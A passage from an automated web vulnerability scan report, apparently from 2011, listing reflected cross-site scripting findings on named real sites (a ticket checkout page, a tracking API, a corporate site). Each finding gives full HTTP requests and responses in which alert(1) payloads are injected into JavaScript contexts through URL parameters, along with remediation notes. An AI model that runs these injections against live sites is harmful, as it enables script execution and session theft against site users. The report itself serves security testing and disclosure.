Status: 200
Vary: Accept-Encoding
Content-Length: 11922
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2b263b';alert(1)//2660bb145a6'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.97. http://bing.fansnap.com/checkout/index/418563179 [poctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the poctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2bd2'%3balert(1)//bac1f343622 was submitted in the poctx parameter. This input was echoed as c2bd2';alert(1)//bac1f343622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3Bc2bd2'%3balert(1)//bac1f343622&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 300
ETag: "5ff9664519f65b9a7781f49ed9ab43df"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Aa%2F%2BCQBjoLb2Zmc2V0af6QnQ%3D%3D--1b66b51438b82f12b3c1ce5c5f99c1f32cece254; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11838
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;c2bd2';alert(1)//bac1f343622', afm: '' });
//]]>
...[SNIP]...

4.98. http://bing.fansnap.com/checkout/index/418563179 [quantity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 415c6%3balert(1)//307985a8d4c was submitted in the quantity parameter. This input was echoed as 415c6;alert(1)//307985a8d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2415c6%3balert(1)//307985a8d4c&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "ebe1f05b5ca7f470ad04bea1006a5098"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CvyHmQBjoLb2Zmc2V0af6QnQ%3D%3D--0279fe035f67d15bb206dd13bb309897befe1c90; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11864
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2415c6;alert(1)//307985a8d4c, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop
...[SNIP]...

4.99. http://bing.fansnap.com/checkout/index/418563179 [uet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the uet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45f62'%3balert(1)//460f48c4516 was submitted in the uet parameter. This input was echoed as 45f62';alert(1)//460f48c4516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62'%3balert(1)//460f48c4516 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 20
ETag: "40ada9b89ee6ead16a400de8babf6823"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B0qUCRBjoLb2Zmc2V0af6QnQ%3D%3D--6657fee0d08aa8e33f9fc98ffe6124427ec80778; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11838
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:38966945f62';alert(1)//460f48c4516'})
//]]>
...[SNIP]...

4.100. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 6b0c8<script>alert(1)</script>acaef72a27e was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B6b0c8<script>alert(1)</script>acaef72a27e HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:17:00 GMT
Content-Type: application/javascript
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "d00ab68f758f97563f85eeddfa221adcab3289cf"
Content-Length: 174
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:17:00 GMT; Path=/
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:17:00 GMT; Path=/

meteor.json_query_callback({"parent_id": "", "id": "nSlUkQ8r7Lb", "uid": "0ad1f409\\x2Dc147\\x2D4bb9\\x2Da425\\x2D2684ee1031f7"}, 0);6b0c8<script>alert(1)</script>acaef72a27e

4.101. http://corporate.everydayhealth.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corporate.everydayhealth.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e12f'%3balert(1)//809941ee22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e12f';alert(1)//809941ee22b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?1e12f'%3balert(1)//809941ee22b=1 HTTP/1.1
Host: corporate.everydayhealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Waterfront-media
Cookie: SL_Audience=210|Accelerated|203|1|0; __utmz=104244948.1305642699.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; s_vi=[CS]v1|26E943688507A615-6000010160003977[CE]; .ASPXANONYMOUS=AcxLMZLcPztjNzU4YjAwZS05NzBkLTQ1MTctYWIyNy03MWNiM2NhYTlmM2I1; __utma=104244948.1964776954.1305642699.1305642699.1305642699.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4766
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
Server-ID: : USNJWWEB02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 19 Jul 2011 20:20:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<script language='javascript'>var theform = document.forms[0];theform.action = '/index.aspx?puid=EEDAA734-76F5-44E1-92C3-004E57847A78&1e12f';alert(1)//809941ee22b=1';</script>
...[SNIP]...

4.102. http://corporate.everydayhealth.com/about-eh-sites.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corporate.everydayhealth.com
Path:   /about-eh-sites.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72398'%3balert(1)//453a224832a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72398';alert(1)//453a224832a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-eh-sites.aspx?72398'%3balert(1)//453a224832a=1 HTTP/1.1
Host: corporate.everydayhealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.everydayhealth.com/
Cookie: SL_Audience=210|Accelerated|203|1|0; __utmz=104244948.1305642699.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; s_vi=[CS]v1|26E943688507A615-6000010160003977[CE]; .ASPXANONYMOUS=Acx84xcyPgZjNzU4YjAwZS05NzBkLTQ1MTctYWIyNy03MWNiM2NhYTlmM2I1; __utma=104244948.1964776954.1305642699.1305642699.1305642699.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9510
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
Server-ID: : USNJWWEB02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 19 Jul 2011 20:20:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
